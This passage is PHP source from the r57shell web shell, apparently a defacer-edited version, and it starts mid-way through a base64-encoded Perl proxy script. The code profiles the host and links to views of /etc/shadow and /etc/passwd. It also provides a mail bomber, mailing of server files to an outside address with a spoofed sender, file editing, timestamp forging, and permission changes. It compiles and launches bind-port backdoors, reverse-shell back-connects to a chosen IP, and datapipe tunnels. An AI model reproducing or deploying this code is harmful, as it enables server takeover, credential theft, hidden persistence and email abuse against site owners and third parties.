3985
3986VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
3987
3988CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
3989
3990b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
3991
39920ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
3993
39949wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
3995
3996CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
3997
3998aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
3999
4000gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
4001
40029yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
4003
4004if($unix)
4005
4006 {
4007
4008 if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
4009
4010 if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
4011
4012 if($safe_mode) { $sysctl = '-'; }
4013
4014 else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
4015
4016 else
4017
4018 {
4019
4020 $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
4021
4022 if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
4023
4024 if(empty($sysctl)) { $sysctl = '-'; }
4025
4026 setcookie('sysctl',$sysctl);
4027
4028 }
4029
4030 }
4031
4032
4033
4034if(!isset($_COOKIE[$lang[$language.'_text137']])) {
4035
4036 $ust_u='';
4037
4038 if($unix && !$safe_mode){
4039
4040 foreach ($userful as $item) {
4041
4042 if(which($item)){$ust_u.=$item;}
4043
4044 }
4045
4046 }
4047
4048 if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";}
4049
4050 if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";}
4051
4052 if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";}
4053
4054 if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";}
4055
4056 if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";}
4057
4058 if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";}
4059
4060 if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";}
4061
4062 if(substr($ust_u,0,1)==",") {$ust_u[0]="";}
4063
4064
4065
4066 $ust_u = trim($ust_u);
4067
4068 setcookie($lang[$language.'_text137'],$ust_u);
4069
4070}else {
4071
4072 $ust_u = trim($_COOKIE[$lang[$language.'_text137']]);
4073
4074}
4075
4076
4077
4078if(!isset($_COOKIE[$lang[$language.'_text138']])) {
4079
4080 $ust_d='';
4081
4082 if($unix && !$safe_mode){
4083
4084 foreach ($danger as $item) {
4085
4086 if(which($item)){$ust_d.=$item;}
4087
4088 }
4089
4090 }
4091
4092 if(!$safe_mode){
4093
4094 foreach ($danger as $item) {
4095
4096 if(ps($item)){$ust_d.=$item;}
4097
4098 }
4099
4100 }
4101
4102 if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust_d.=", mod_security";}
4103
4104 if(substr($ust_d,0,1)==",") {$ust_d[0]="";}
4105
4106
4107
4108 $ust_d = trim($ust_d);
4109
4110 setcookie($lang[$language.'_text138'],$ust_d);
4111
4112}else {
4113
4114 $ust_d = trim($_COOKIE[$lang[$language.'_text138']]);
4115
4116}
4117
4118
4119
4120if(!isset($_COOKIE[$lang[$language.'_text142']])) {
4121
4122
4123
4124 $select_downloaders='<select size="1" name=with>';
4125
4126 if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= "<option value=\"fopen\">fopen</option>";$downloader="fopen";}
4127
4128 if($unix && !$safe_mode){
4129
4130 foreach ($downloaders as $item) {
4131
4132 if(which($item)){$select_downloaders .= '<option value="'.$item.'">'.$item.'</option>';$downloader.=", $item";}
4133
4134 }
4135
4136 }
4137
4138 $select_downloaders .= '</select>';
4139
4140 if(substr($downloader,0,1)==",") {$downloader[0]="";}
4141
4142
4143
4144 $downloader=trim($downloader);
4145
4146 setcookie('select_downloaders',$select_downloaders);
4147
4148 setcookie('downloader',$downloader);
4149
4150}else {
4151
4152 $select_downloaders = $_COOKIE['select_downloaders'];
4153
4154 $downloader = trim($_COOKIE['downloader']);
4155
4156}
4157
4158
4159
4160
4161
4162echo $head;
4163
4164echo '</head>';
4165
4166
4167
4168echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=100><font face=Verdana size=2>'.
4169
4170ws(2).'<b>'.ws(2).'<center>r57shell<br>v.'.$version.'</b><br><p><b><font color="#FF0000" size="2">Edited By KingDefacer</font></b></p></center></font>'.
4171
4172$fs.'<font face=Verdana size=-2><center>'.$lang[$language.'_text143']."<b>".$tempdir."</b><br>".$select_tempdir.'<br>'.in('submit','submit',0,$lang[$language.'_butt6']).
4173
4174'</center></font>'.$fe.'</td>'.'<td bgcolor=#cccccc><font face=Verdana size=-2>';
4175
4176echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";
4177
4178echo " X_FORWARDED_FOR:"; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){echo "[<font color=red>".$_SERVER['HTTP_X_FORWARDED_FOR']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";}
4179
4180echo " CLIENT_IP: ";if(isset($_SERVER['HTTP_CLIENT_IP'])){echo "[<font color=red>".$_SERVER['HTTP_CLIENT_IP']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";}
4181
4182echo " Server IP: [<font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]";
4183
4184
4185
4186echo "<br>";
4187
4188
4189
4190echo ws(2)."PHP version: <b>".@phpversion()."</b>";
4191
4192$curl_on = @function_exists('curl_version');
4193
4194echo ws(2);
4195
4196echo "cURL: <b>".(($curl_on)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
4197
4198echo "</b>".ws(2);
4199
4200echo "MySQL: <b>";
4201
4202$mysql_on = @function_exists('mysql_connect');
4203
4204if($mysql_on){
4205
4206echo "<font color=red>ON</font>"; } else { echo "<font color=green>OFF</font>"; }
4207
4208echo "</b>".ws(2);
4209
4210echo "MSSQL: <b>";
4211
4212$mssql_on = @function_exists('mssql_connect');
4213
4214if($mssql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4215
4216echo "</b>".ws(2);
4217
4218echo "PostgreSQL: <b>";
4219
4220$pg_on = @function_exists('pg_connect');
4221
4222if($pg_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4223
4224echo "</b>".ws(2);
4225
4226echo "Oracle: <b>";
4227
4228$ora_on = @function_exists('ocilogon');
4229
4230if($ora_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4231
4232echo "</b>".ws(2);
4233
4234echo "MySQLi: <b>";
4235
4236$mysqli_on = @function_exists('mysqli_connect');
4237
4238if($mysqli_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4239
4240echo "</b>".ws(2);
4241
4242echo "mSQL: <b>";
4243
4244$msql_on = @function_exists('msql_connect');
4245
4246if($msql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4247
4248echo "</b>".ws(2);
4249
4250echo "SQLite: <b>";
4251
4252$sqlite_on = @function_exists('sqlite_open');
4253
4254if($sqlite_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4255
4256echo "</b><br>".ws(2);
4257
4258
4259
4260echo "Safe_mode: <b>";
4261
4262echo (($safe_mode)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
4263
4264echo "</b>".ws(2);
4265
4266echo "Open_basedir: <b>";
4267
4268if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=red>$df</font></b>";};}
4269
4270else {echo "<font color=green>NONE</font></b>";}
4271
4272echo ws(2)."Safe_exec_dir: <b>";
4273
4274if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
4275
4276else {echo "<font color=red>ini_get disable!</font></b>";}
4277
4278echo ws(2)."Safe_gid: <b>";
4279
4280if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "<font color=green>ON</font></b>";}else {echo "<font color=red>OFF</font></b>";};}
4281
4282else {echo "<font color=red>ini_get disable!</font></b>";}
4283
4284echo ws(2)."Safe_include_dir: <b>";
4285
4286if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
4287
4288else {echo "<font color=red>ini_get disable!</font></b>";}
4289
4290echo ws(2)."Sql.safe_mode: <b>";
4291
4292if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=green>OFF</font></b>";};}
4293
4294else {echo "<font color=red>ini_get disable!</font></b>";}
4295
4296
4297
4298echo "<br>".ws(2);
4299
4300echo "Disable functions : <b>";$df='ini_get disable!';
4301
4302if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
4303
4304
4305
4306if(@function_exists('diskfreespace')){$free = @diskfreespace($dir);}
4307
4308elseif(@function_exists('disk_free_space')){$free = @disk_free_space($dir);}else{$free = 'Unknown';}
4309
4310if (!$free) {$free = 0;}
4311
4312$all = @disk_total_space($dir);
4313
4314if (!$all) {$all = 0;}
4315
4316echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
4317
4318
4319
4320
4321
4322if($ust_u){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust_u."</font>";};
4323
4324
4325
4326if($ust_d){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>".$ust_d."</font>";};
4327
4328
4329
4330if($downloader){echo "<br>".ws(2).$lang[$language.'_text142'].": <font color=blue>".$downloader."</font>";};
4331
4332
4333
4334
4335
4336echo "<br>".ws(2)."</b>";
4337
4338echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?1' title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
4339
4340echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?2' title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
4341
4342echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?3' title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
4343
4344echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?4' title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
4345
4346if(!$unix) {
4347
4348 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?5' title=\"".$lang[$language.'_text50']."\"><b>systeminfo</b></a> ".$rb;
4349
4350}else{
4351
4352 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?6' title=\"View syslog.conf\"><b>syslog</b></a> ".$rb;
4353
4354 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?7' title=\"View resolv\"><b>resolv</b></a> ".$rb;
4355
4356 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?8' title=\"View hosts\"><b>hosts</b></a> ".$rb;
4357
4358 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?9' title=\"View shadow\"><b>shadow</b></a> ".$rb;
4359
4360 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?10' title=\"".$lang[$language.'_text95']."\"><b>passwd</b></a> ".$rb;
4361
4362}
4363
4364echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?11' title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
4365
4366echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?12' title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb;
4367
4368
4369
4370if($unix && !$safe_mode)
4371
4372{
4373
4374 echo "<br>".ws(2)."</b>";
4375
4376 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?13' title=\"View procinfo\"><b>procinfo</b></a> ".$rb;
4377
4378 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?14' title=\"View proc version\"><b>version</b></a> ".$rb;
4379
4380 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?15' title=\"View mem free\"><b>free</b></a> ".$rb;
4381
4382 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?16' title=\"View dmesg\"><b>dmesg</b></a> ".$rb;
4383
4384 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?17' title=\"View vmstat\"><b>vmstat</b></a> ".$rb;
4385
4386 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?18' title=\"View lspci\"><b>lspci</b></a> ".$rb;
4387
4388 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?19' title=\"View lsdev\"><b>lsdev</b></a> ".$rb;
4389
4390 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?20' title=\"View interrupts\"><b>interrupts</b></a> ".$rb;
4391
4392 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?21' title=\"View realise1\"><b>realise1</b></a> ".$rb;
4393
4394 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?22' title=\"View realise2\"><b>realise2</b></a> ".$rb;
4395
4396 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?23' title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;
4397
4398
4399
4400 echo "<br>".ws(2)."</b>";
4401
4402 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?24' title=\"View w\"><b>w</b></a> ".$rb;
4403
4404 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?25' title=\"View who\"><b>who</b></a> ".$rb;
4405
4406 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?26' title=\"View uptime\"><b>uptime</b></a> ".$rb;
4407
4408 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?27' title=\"View last -n 10\"><b>last</b></a> ".$rb;
4409
4410 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?28' title=\"View ps -aux\"><b>ps aux</b></a> ".$rb;
4411
4412 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?29' title=\"View service\"><b>service</b></a> ".$rb;
4413
4414 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?30' title=\"View ifconfig\"><b>ifconfig</b></a> ".$rb;
4415
4416 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?31' title=\"View netstat -a\"><b>netstat</b></a> ".$rb;
4417
4418 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?32' title=\"View fstab\"><b>fstab</b></a> ".$rb;
4419
4420 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?33' title=\"View fdisk -l\"><b>fdisk</b></a> ".$rb;
4421
4422 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?34' title=\"View df -h\"><b>df -h</b></a> ".$rb;
4423
4424}
4425
4426
4427
4428echo '</font></td></tr><table>
4429
4430<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
4431
4432<tr><td align=right width=100>';
4433
4434echo $font;
4435
4436
4437
4438if($unix){
4439
4440echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
4441
4442echo "</td><td>";
4443
4444echo "<font face=Verdana size=-2 color=red><b>";
4445
4446echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
4447
4448echo ws(3).$sysctl."<br>";
4449
4450echo ws(3).ex('echo $OSTYPE')."<br>";
4451
4452echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
4453
4454if(!empty($id)) { echo ws(3).$id."<br>"; }
4455
4456else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid'))
4457
4458 {
4459
4460 $euserinfo = @posix_getpwuid(@posix_geteuid());
4461
4462 $egroupinfo = @posix_getgrgid(@posix_getegid());
4463
4464 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
4465
4466 }
4467
4468else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
4469
4470echo ws(3).$dir;
4471
4472echo ws(3).'( '.perms(@fileperms($dir)).' )';
4473
4474echo "</b></font>";
4475
4476}
4477
4478else
4479
4480{
4481
4482echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
4483
4484echo "</td><td>";
4485
4486echo "<font face=Verdana size=-2 color=red><b>";
4487
4488echo ws(3).@substr(@php_uname(),0,120)."<br>";
4489
4490echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
4491
4492echo ws(3).@getenv("USERNAME")."<br>";
4493
4494echo ws(3).$dir;
4495
4496echo "<br></font>";
4497
4498}
4499
4500echo "</font>";
4501
4502echo "</td></tr></table>";
4503
4504
4505
4506if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
4507
4508 {
4509
4510 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
4511
4512 err(6+$res);
4513
4514 $_POST['cmd']="";
4515
4516 }
4517
4518if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
4519
4520 {
4521
4522 if($file=moreread($_POST['loc_file'])){ $filedump = $file; }
4523
4524 else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
4525
4526 if(!empty($_POST['cmd']))
4527
4528 {
4529
4530 $filename = @basename($_POST['loc_file']);
4531
4532 $content_encoding=$mime_type='';
4533
4534 compress($filename,$filedump,$_POST['compress']);
4535
4536 $attach = array(
4537
4538 "name"=>$filename,
4539
4540 "type"=>$mime_type,
4541
4542 "content"=>$filedump
4543
4544 );
4545
4546 if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
4547
4548 if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
4549
4550 $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
4551
4552 err(6+$res);
4553
4554 $_POST['cmd']="";
4555
4556 }
4557
4558 }
4559
4560if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size']))
4561
4562 {
4563
4564 for($h=1;$h<=$_POST['mail_flood'];$h++){
4565
4566 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
4567
4568 }
4569
4570 err(6+$res);
4571
4572 $_POST['cmd']="";
4573
4574 }
4575
4576if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
4577
4578{
4579
4580$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
4581
4582}
4583
4584if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
4585
4586 {
4587
4588 switch($_POST['what'])
4589
4590 {
4591
4592 case 'own':
4593
4594 @chown($_POST['param1'],$_POST['param2']);
4595
4596 break;
4597
4598 case 'grp':
4599
4600 @chgrp($_POST['param1'],$_POST['param2']);
4601
4602 break;
4603
4604 case 'mod':
4605
4606 @chmod($_POST['param1'],intval($_POST['param2'], 8));
4607
4608 break;
4609
4610 }
4611
4612 $_POST['cmd']="";
4613
4614 }
4615
4616if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
4617
4618 {
4619
4620 switch($_POST['what'])
4621
4622 {
4623
4624 case 'file':
4625
4626 if($_POST['action'] == "create")
4627
4628 {
4629
4630 if(@file_exists($_POST['mk_name']) || !morewrite($_POST['mk_name'],'your text here')) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
4631
4632 else {
4633
4634 $_POST['e_name'] = $_POST['mk_name'];
4635
4636 $_POST['cmd']="edit_file";
4637
4638 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
4639
4640 }
4641
4642 }
4643
4644 else if($_POST['action'] == "delete")
4645
4646 {
4647
4648 if(@unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
4649
4650 $_POST['cmd']="";
4651
4652 }
4653
4654 break;
4655
4656 case 'dir':
4657
4658 if($_POST['action'] == "create"){
4659
4660 if(@mkdir($_POST['mk_name']))
4661
4662 {
4663
4664 $_POST['cmd']="";
4665
4666 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
4667
4668 }
4669
4670 else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
4671
4672 }
4673
4674 else if($_POST['action'] == "delete"){
4675
4676 if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
4677
4678 $_POST['cmd']="";
4679
4680 }
4681
4682 break;
4683
4684 }
4685
4686 }
4687
4688
4689
4690
4691
4692if(!empty($_POST['cmd']) && $_POST['cmd']=="touch")
4693
4694{
4695
4696if(!$_POST['file_name_r'])
4697
4698 {
4699
4700 $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
4701
4702 $datar = @strtotime($datar);
4703
4704 @touch($_POST['file_name'],$datar,$datar);}
4705
4706else{
4707
4708 @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
4709
4710}
4711
4712$_POST['cmd']="";
4713
4714}
4715
4716
4717
4718
4719
4720if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
4721
4722 {
4723
4724 if(@is_dir($_POST['e_name'])){ err(1,$_POST['e_name']); $_POST['cmd']=""; }
4725
4726 elseif($file=moreread($_POST['e_name'])) { $filedump = $file; if(!@is_writable($_POST['e_name'])) { $only_read = 1; }; }
4727
4728 elseif($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; }
4729
4730 elseif(@file_exists($_POST['e_name'])) {$filedump = 'NONE'; if(!@is_writable($_POST['e_name'])) { $only_read = 1; };}
4731
4732 else { err(1,$_POST['e_name']); $_POST['cmd']=""; }
4733
4734 if(!empty($_POST['cmd']))
4735
4736 {
4737
4738 echo $table_up3;
4739
4740 echo $font;
4741
4742 echo "<form name=save_file method=post>";
4743
4744 echo ws(3)."<b>".$_POST['e_name']."</b>";
4745
4746 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
4747
4748 echo @htmlspecialchars($filedump);
4749
4750 echo "</textarea>";
4751
4752 echo "<input type=hidden name=e_name value='".$_POST['e_name']."'>";
4753
4754 echo "<input type=hidden name=dir value='".$dir."'>";
4755
4756 echo "<input type=hidden name=cmd value=save_file>";
4757
4758 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
4759
4760 echo "</div>";
4761
4762 echo "</font>";
4763
4764 echo "</form>";
4765
4766 echo "</td></tr></table>";
4767
4768 exit();
4769
4770 }
4771
4772 }
4773
4774if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
4775
4776 {
4777
4778 $mtime = @filemtime($_POST['e_name']);
4779
4780 if(!@is_writable($_POST['e_name'])) { err(0,$_POST['e_name']); }
4781
4782 else {
4783
4784 if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
4785
4786 morewrite($_POST['e_name'],$_POST['e_text']);
4787
4788 $_POST['cmd']="";
4789
4790 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
4791
4792 }
4793
4794 @touch($_POST['e_name'],$mtime,$mtime);
4795
4796 }
4797
4798
4799
4800
4801
4802if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl"))
4803
4804{
4805
4806 cf($tempdir.'prxpl',$prx_pl);
4807
4808 $p2=which("perl");
4809
4810 $blah = ex($p2.' '.$tempdir.'prxpl '.$_POST['proxy_port'].' &');
4811
4812 @unlink($tempdir.'prxpl');
4813
4814 $_POST['cmd']="ps -aux | grep prxpl";
4815
4816}
4817
4818if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
4819
4820{
4821
4822 cf($tempdir.'bd.c',$port_bind_bd_c);
4823
4824 $blah = ex('gcc -o '.$tempdir.'bd '.$tempdir.'bd.c');
4825
4826 @unlink($tempdir.'bd.c');
4827
4828 $blah = ex($tempdir.'bd '.$_POST['port'].' '.$_POST['bind_pass'].' &');
4829
4830 @unlink($tempdir.'bd');
4831
4832 $_POST['cmd']="ps -aux | grep bd";
4833
4834}
4835
4836if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
4837
4838{
4839
4840 cf($tempdir.'bdpl',$port_bind_bd_pl);
4841
4842 $p2=which("perl");
4843
4844 $blah = ex($p2.' '.$tempdir.'bdpl '.$_POST['port'].' &');
4845
4846 @unlink($tempdir.'bdpl');
4847
4848 $_POST['cmd']="ps -aux | grep bdpl";
4849
4850}
4851
4852if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
4853
4854{
4855
4856 cf($tempdir.'back',$back_connect);
4857
4858 $p2=which("perl");
4859
4860 $blah = ex($p2.' '.$tempdir.'back '.$_POST['ip'].' '.$_POST['port'].' &');
4861
4862 @unlink($tempdir.'back');
4863
4864 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
4865
4866}
4867
4868if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
4869
4870{
4871
4872 cf($tempdir.'back.c',$back_connect_c);
4873
4874 $blah = ex('gcc -o '.$tempdir.'backc '.$tempdir.'back.c');
4875
4876 @unlink($tempdir.'back.c');
4877
4878 $blah = ex($tempdir.'backc '.$_POST['ip'].' '.$_POST['port'].' &');
4879
4880 @unlink($tempdir.'back');
4881
4882 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
4883
4884}
4885
4886if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
4887
4888{
4889
4890 cf($tempdir.'dp',$datapipe_pl);
4891
4892 $p2=which("perl");
4893
4894 $blah = ex($p2.' '.$tempdir.'dp '.$_POST['local_port'].' '.$_POST['remote_host'].' '.$_POST['remote_port'].' &');
4895
4896 @unlink($tempdir.'dp');
4897
4898 $_POST['cmd']="ps -aux | grep dp";
4899
4900}
4901
4902if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
4903
4904{
4905
4906 cf($tempdir.'dpc.c',$datapipe_c);
4907
